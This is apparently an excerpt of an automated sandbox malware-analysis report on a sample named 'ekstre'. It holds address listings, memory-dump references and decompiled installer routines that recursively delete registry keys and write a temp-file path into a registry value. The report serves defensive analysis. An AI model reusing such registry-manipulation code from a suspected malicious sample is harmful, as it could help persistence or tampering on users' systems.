0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406ccd
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd2
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cef
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d35
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073dd
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x00407413
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743b
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406dcf
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000

Strings

<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.83, xrefs: 00406BBA

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID:
String ID: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.83
API String ID: 0-2121849026
Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD2049 Relevance: 7.6, APIs: 5, Instructions: 129
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E6DDD2049(signed int _a4) {
				signed int _t44;
				void* _t45;
				signed int _t46;
				signed int _t50;
				void* _t54;
				signed int _t57;
				void* _t58;
				int _t59;

				_t50 = _a4;
				_t59 = 0;
				_t44 = 0 |  *((intOrPtr*)(_t50 + 0x1014)) > 0x00000000;
				while(1) {
					L1:
					_a4 = _t44;
					_t57 = _t44 << 5;
					_t58 =  *(_t57 + _t50 + 0x1030);
					if(_t58 == 0 || _t58 == 0x1a) {
						goto L8;
					}
					if(_t58 != 0xffffffff) {
						_t49 = _t58 - 1;
						if(_t58 - 1 > 0x18) {
							 *(_t57 + _t50 + 0x1030) = 0x1a;
							L11:
							_t54 = _t57 + _t50;
							if( *((intOrPtr*)(_t57 + _t50 + 0x101c)) >= _t59) {
							}
							_t46 =  *(_t57 + _t50 + 0x1018) & 0x000000ff;
							 *(_t57 + _t50 + 0x1034) =  *(_t57 + _t50 + 0x1034) & 0x00000000;
							if(_t46 > 7) {
								L26:
								_t59 = 0;
								goto L27;
							} else {
								switch( *((intOrPtr*)(_t46 * 4 +  &M6DDD21E9))) {
									case 0:
										_t59 = 0;
										 *((intOrPtr*)(_t54 + 0x1020)) = 0;
										goto L27;
									case 1:
										_push(__esi);
										__eax = E6DDD135A();
										goto L18;
									case 2:
										_push(__esi);
										__eax = E6DDD135A();
										_pop(__ecx);
										 *__ebp = __eax;
										_a4 = __edx;
										goto L26;
									case 3:
										__eax = GlobalAlloc(0x40,  *0x6ddd5040);
										 *(__edi + __ebx + 0x1034) = __eax;
										 *__ebp = __eax;
										__ebp = 0;
										__ecx =  *0x6ddd5040;
										__eax = WideCharToMultiByte(0, 0, __esi,  *0x6ddd5040, __eax,  *0x6ddd5040, 0, 0);
										goto L27;
									case 4:
										__eax = E6DDD12E1(__esi);
										 *(__edi + __ebx + 0x1034) = __eax;
										L18:
										_pop(__ecx);
										 *__ebp = __eax;
										goto L26;
									case 5:
										__eax = GlobalAlloc(0x40, "true");
										_push(__eax);
										 *(__edi + __ebx + 0x1034) = __eax;
										_push(__esi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										goto L26;
									case 6:
										__ebp = 0;
										if( *__esi != __bp) {
											_push(__esi);
											__eax = E6DDD135A();
											 *(__edi + __ebx + 0x1020) = __eax;
										}
										L27:
										_t47 = GlobalFree(_t58); // executed
										_t55 = _a4;
										if(_t55 == 0) {
											return _t47;
										}
										_t53 =  !=  ? _t55 + 1 : 0;
										_t44 =  !=  ? _t55 + 1 : 0;
										goto L1;
									case 7:
										__ecx =  *(__edi + __ebx + 0x1030);
										__eax =  *0x6ddd5038;
										 *(__edi + __ebx + 0x1030) - 1 = ( *(__edi + __ebx + 0x1030) - 1) *  *0x6ddd5040;
										__ecx =  *0x6ddd5038 + ( *(__edi + __ebx + 0x1030) - 1) *  *0x6ddd5040 * 2;
										__eax = __ecx + 0x18;
										 *(__edx + 0x1020) = __eax;
										_push(__ecx);
										asm("cdq");
										_push(__edx);
										_push(__eax);
										__eax = E6DDD149E(__ecx);
										__esp = __esp + 0xc;
										goto L26;
								}
							}
						}
						_t45 = E6DDD1548(_t49);
						L9:
						L10:
						_t58 = _t45;
						goto L11;
					}
					_t45 = E6DDD1593();
					goto L10;
					L8:
					_t45 = E6DDD12E1(0x6ddd40e0);
					goto L9;
				}
			}

0x6ddd204a
0x6ddd2051
0x6ddd205b
0x6ddd205e
0x6ddd205e
0x6ddd2060
0x6ddd2064
0x6ddd2067
0x6ddd2070
0x00000000
0x00000000
0x6ddd207a
0x6ddd2083
0x6ddd2089
0x6ddd2093
0x6ddd20ad
0x6ddd20ad
0x6ddd20b7
0x6ddd20b7
0x6ddd20c7
0x6ddd20cf
0x6ddd20da
0x6ddd21bc
0x6ddd21bc
0x00000000
0x6ddd20e0
0x6ddd20e0
0x00000000
0x6ddd20e7
0x6ddd20e9
0x00000000
0x00000000
0x6ddd20f4
0x6ddd20f5
0x00000000
0x00000000
0x6ddd2103
0x6ddd2104
0x6ddd2109
0x6ddd210a
0x6ddd210d
0x00000000
0x00000000
0x6ddd212c
0x6ddd2132
0x6ddd2139
0x6ddd213c
0x6ddd213e
0x6ddd214c
0x00000000
0x00000000
0x6ddd2116
0x6ddd211b
0x6ddd20fa
0x6ddd20fa
0x6ddd20fb
0x00000000
0x00000000
0x6ddd2158
0x6ddd215e
0x6ddd215f
0x6ddd2166
0x6ddd2167
0x6ddd216a
0x00000000
0x00000000
0x6ddd2172
0x6ddd2177
0x6ddd2179
0x6ddd217a
0x6ddd2187
0x6ddd2187
0x6ddd21be
0x6ddd21bf
0x6ddd21c5
0x6ddd21cb
0x6ddd21e6
0x6ddd21e6
0x6ddd21d8
0x6ddd21db
0x00000000
0x00000000
0x6ddd2190
0x6ddd2197
0x6ddd219d
0x6ddd21a4
0x6ddd21a7
0x6ddd21aa
0x6ddd21b0
0x6ddd21b1
0x6ddd21b2
0x6ddd21b3
0x6ddd21b4
0x6ddd21b9
0x00000000
0x00000000
0x6ddd20e0
0x6ddd20da
0x6ddd208c
0x6ddd20aa
0x6ddd20ab
0x6ddd20ab
0x00000000
0x6ddd20ab
0x6ddd207c
0x00000000
0x6ddd20a0
0x6ddd20a5
0x00000000
0x6ddd20a5

APIs

GlobalFree.KERNELBASE(00000000), ref: 6DDD21BF

Part of subcall function 6DDD12E1: lstrcpynW.KERNEL32(00000000,?,6DDD156A,?,6DDD11C4,-000000A0), ref: 6DDD12F1

GlobalAlloc.KERNEL32(00000040), ref: 6DDD212C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6DDD214C

Memory Dump Source

Source File: 00000000.00000002.1347263504.000000006DDD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DDD0000, based on PE: true

Associated: 00000000.00000002.1347232243.000000006DDD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347305831.000000006DDD4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347348567.000000006DDD6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ddd0000_ekstre.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 83633752d358178b7ad73b7e11653dbdb00d86b030c234b1cdf0949a765b6b98
Instruction ID: 9f26722b10cded572da0a1087e08c0e83e909ddda178395da61bbb2d761bab63
Opcode Fuzzy Hash: 83633752d358178b7ad73b7e11653dbdb00d86b030c234b1cdf0949a765b6b98
Instruction Fuzzy Hash: 1441E571589205EFDFA1BF68C844BFA7BB8FB06348B45823DFA489A149D7706540CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				char _t27;
				int _t30;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x4125f8) + _t29 + 2;
					}
					if(_t37 == 4) {
						_t27 = E00402D84(3);
						_pop(_t32);
						 *0x4125f8 = _t27;
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x4125f8, 0xc000);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x4125f8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x4702e8 =  *0x4702e8 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024e5
0x004024ea
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x00402515
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc76F4.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024D5
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc76F4.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402515
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc76F4.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nsc76F4.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
